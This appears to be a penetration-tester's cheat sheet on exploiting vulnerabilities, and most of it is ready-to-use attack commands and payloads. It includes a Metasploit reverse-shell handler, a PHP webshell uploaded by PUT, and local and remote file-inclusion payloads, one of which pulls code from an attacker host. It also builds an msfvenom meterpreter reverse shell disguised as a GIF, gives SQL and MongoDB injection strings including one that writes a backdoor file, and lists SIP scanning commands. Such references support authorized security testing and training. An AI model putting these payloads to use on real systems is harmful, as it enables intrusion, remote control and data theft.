Chapter 3 - Exploiting Vulnerabilities
Finding Exploits
Search Exploit-DB
Kali> searchsploit windows 2003 | grep -i localTo quickly view the exploit
Kali> searchsploit -x ######.pySearch Google
Google> site:exploit-db.com exploit kernel <= 3Search Metasploit
Kali> grep -R "W7" /usr/share/metasploit-framework/modules/exploit/windows/*Search Vulners
Compiling Exploits
Compile for Windows
Kali> i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exeCompile for Architectures
Kali> gcc -m32 -o output32 hello.c (32 bit)
Kali> gcc -m64 -o output hello.c (64 bit)Catching Exploits
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.123
lhost => 192.168.1.123
msf exploit(multi/handler) > set lport 4444
lport => 4444
msf exploit(multi/handler) > runBreaking out of Virtualization
WebSockets
IPV6
HTTP
Resources
Cracking the Lens: Attacking HTTPs hidden attack surface
How I hacked hundreds of companies through their helpdesk
Headers
Find what request methods the web server supports Add the following into your Burp repeater
OPTIONS * HTTP/1.1
...Send fake IP
Kali> curl --header "X-Forwarded-For: 192.168.1.1" http://$TARGETWebshells
PHP CMD Shell
Place in body of a PUT request and give it a file name
PUT /directory/shell.php HTTP/1.1
...
<body>
<?php
Echo exec($_GET[cmd]);
?>Usage:
http://victim/directory/shell.php?cmd=whoami
Resources
XXE
Resources
Exploitation: XML External Entity (XXE) Injection
Exploiting a Real-World XXE Vulnerability
Exploiting XXE Vulnerabilities in file parsing
XSS
Resources
XSS Attack: Busting browsers to root
CORS
Resources
CSRF
Resources
Computerphile: Cross Site Request Forgery
Updating Anti-CSRF Tokens with BurpSuite
SSRF
Resources
What is Server side Request Forgery?
Exploiting Server Side Request Forgery on a Node/Express Application (hosted on Amazon EC2)
Example
Sometimes what appears to be RFI can lead to SSRF, here are some commands to help
# Port scan the internal resources available
Kali> wfuzz -c -z range,1-65535 --filter "l>2" http://$TARGET/proxy.php?path=localhost:FUZZ
# If you find one, dirbust it.
Kali> wfuzz -c -w /usr/share/wordlists/dirb/big.txt --filter "l>11" http://$TARGET:8080/FUZZRCE
Resources
Node.js Remote Code Execution as a Service
Exploiting Python code execution in the web
Utilizing Code Re-use or ROP in PHP Exploits
Pwning PHP Mail Function for fun and RCE
Server Side Template Injection
Resources
Server Side Template Injection
Server Side Template Injection: RCE for the Modern WebApp
API
Resources
LFI
Resources
Local File Inclusion Testing Techniques
Insecure PHP Functions & their Exploits (LFI/RFI)
LFI and RFI -- The Website Security Vulnerability
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Execution Advanced Exploitation PROC Shortcuts
Examples
file:///etc/passwd
../../../etc/passwd
php://filter/convert.base64-encode/resource=admin.php
php://filter/convert.base64-encode/resource=../../../../../etc/passwd
php://input
send post data
expect://whoamiOpen Redirects
Resources
RFI
Kali> echo "<?php phpinfo(); ?>" > evil.txt
http://$TARGET/index.php?path=http://$ATTACKER/evil.txtPadding Oracle Attack
Resources
Automated Padding Oracle Attacks with Padbuster
Arguments
url - first argument is the URL
encrypted - second argument is the encrypted text
bits - third argument is the number of bits per block
-cookies - define a cookie to use
-plaintext - plaintext to encrypt
Examples
Kali> padBuster.pl http://$TARGET "ENC-COOKIE-TEXT" 8
-cookies "ENC-COOKIE"
-plaintext '{"user":"admin","role":"admin"}'AWS
Resources
AWS PENETRATION TESTING PART 1. S3 BUCKETS
File Upload
Make a backdoor GIF
# As a note, try to overwrite the magic bytes of your backdoor with a valid image
# so that the check will validate. This includes Content-Type.
Kali> msfvenom --list | grep php
Kali> msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.15.237 LPORT=54321 -o evil.php
Kali> echo “FFD8FFEo” | xxd -r -p > evil.gif
Kali> cat evil.php >> evil.gif
Upload From CLI
Kali> curl -X POST
-F "field1=test"
-F "file=@/home/user/evil.gif"
http://$TARGET/upload.php
--cookie "cookie"E-Mail
Resources
How to Bypass E-Mail gateways using common payloads
iSCSI
Resources
An interesting route to domain admin via ISCSI
Databases
MySQL
Resources
SQLMap tricks for advanced SQL injeciton
Examples
username'--
1'||'1'<'2
'OR 1=1;--
'OR 1=1;#
'OR 1=1 LIMIT 1; #
AND 1 = 2 UNION SELECT 1,2,3,4,5
1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); --
1 or 1=1
1' or '1'='1
1or1=1
1'or'1'='1
fake@ema'or'il.nl'='il.nl
1 union all select 1,2,3,4,load_file("/etc/passwd"),6
1 union all select 1,2,3,4,"<?php ?>",6 into outfile '/var/www/html/backdoor.php'MSSQL
Resources
SQL Injection Cheatsheet MSSQL
MongoDB
Resources
Examples
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
';sleep(5000);
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);PBX
Resources
Introduction to Telephony and PBX
Examples
Kali> svmap $TARGET
Kali> svwar -m INVITE -eSTART-END $TARGETLast updated
Was this helpful?